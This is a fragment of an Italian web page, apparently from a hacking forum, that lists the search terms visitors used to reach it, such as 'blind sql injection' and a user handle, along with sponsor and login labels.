  10.  

Sponsor

I visitatori sono atterrati su questa pagina cercando:

devil401

d3v1l401 sql

devil401 inforgeblind sql injection trovare colonnainurl order.php idd3v1l401 sql injectionview proxyblind sql mysql 4

Accedi

Accedi